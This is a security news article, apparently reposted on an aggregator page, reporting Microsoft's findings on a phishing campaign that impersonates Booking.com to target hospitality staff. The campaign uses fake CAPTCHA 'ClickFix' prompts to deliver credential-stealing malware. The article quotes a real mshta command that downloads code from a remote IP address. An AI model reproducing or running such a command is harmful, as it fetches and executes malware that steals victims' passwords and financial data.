_JIRAROJ_PRADITCHAROENKUL_Alamy.jpg?#)
![Sonos Abandons Streaming Device That Aimed to Rival Apple TV [Report]](https://www.iclarified.com/images/news/96703/96703/96703-640.jpg)
![HomePod With Display Delayed to Sync With iOS 19 Redesign [Kuo]](https://www.iclarified.com/images/news/96702/96702/96702-640.jpg)
![iPhone 17 Air to Measure 9.5mm Thick Including Camera Bar [Rumor]](https://www.iclarified.com/images/news/96699/96699/96699-640.jpg)
![[The AI Show Episode 139]: The Government Knows AGI Is Coming, Superintelligence Strategy, OpenAI’s $20,000 Per Month Agents & Top 100 Gen AI Apps](https://www.marketingaiinstitute.com/hubfs/ep%20139%20cover-2.png)
![[The AI Show Episode 138]: Introducing GPT-4.5, Claude 3.7 Sonnet, Alexa+, Deep Research Now in ChatGPT Plus & How AI Is Disrupting Writing](https://www.marketingaiinstitute.com/hubfs/ep%20138%20cover.png)
Microsoft Warns of Cyber Attack Mimic Booking .com To Deliver Password Stealing Malware
Microsoft Threat Intelligence has identified an ongoing phishing campaign impersonating Booking.com to deliver credential-stealing malware. The campaign, which began in December 2024, targets hospitality organizations in North America, Oceania, Asia, and Europe. This sophisticated attack specifically aims at individuals in these organizations who are most likely to work with the popular travel platform. The attackers […] The post Microsoft Warns of Cyber Attack Mimic Booking .com To Deliver Password Stealing Malware appeared first on Cyber Security News.
Microsoft Threat Intelligence has identified an ongoing phishing campaign impersonating Booking.com to deliver credential-stealing malware.
The campaign, which began in December 2024, targets hospitality organizations in North America, Oceania, Asia, and Europe.
This sophisticated attack specifically aims at individuals in these organizations who are most likely to work with the popular travel platform.
The attackers send fake emails purporting to be from Booking.com, with content ranging from negative guest reviews to account verification requests.
These messages contain malicious links or PDF attachments leading to fraudulent websites that mimic Booking.com’s legitimate pages, creating a convincing illusion to trick unsuspecting victims.
Security analysts at Microsoft noted that this campaign employs a technique called “ClickFix,” which displays fake error messages instructing users to execute commands that download malware.
This social engineering method takes advantage of human problem-solving tendencies to bypass conventional security measures by requiring user interaction rather than relying on automated execution.
.webp)
When victims click the malicious links, they see a webpage with a fake CAPTCHA overlay instructing them to use a keyboard shortcut to open Windows Run and paste a command that’s automatically copied to their clipboard.
The design mimics legitimate security verification systems, giving victims a false sense of security.
.webp)
This command typically uses mshta.exe to download malicious code, such as: “mshta http://92.255.57.155/Capcha.html # ‘I am not a robot – reCAPTCHA Verification ID: 3781′”.
This seemingly innocuous command initiates the download of dangerous malware without triggering conventional security alerts.
Technical Anatomy of the Attack
The campaign delivers multiple malware families including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. These steal financial data and credentials for fraudulent use.
.webp)
The infection chain begins with the phishing email, proceeds through the fake CAPTCHA page, and completes when victims follow the ClickFix instructions.
Microsoft tracks this as Storm-1865, a threat actor that has conducted similar campaigns since early 2023.
The addition of ClickFix to their tactics shows how this threat actor evolves to circumvent security measures, specifically targeting hospitality staff who regularly interact with Booking.com as part of their duties.
The malware’s capabilities include stealing stored passwords from browsers, capturing financial information, and potentially providing remote access to compromised systems, allowing attackers to conduct further malicious activities within the victim’s network.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
The post Microsoft Warns of Cyber Attack Mimic Booking .com To Deliver Password Stealing Malware appeared first on Cyber Security News.
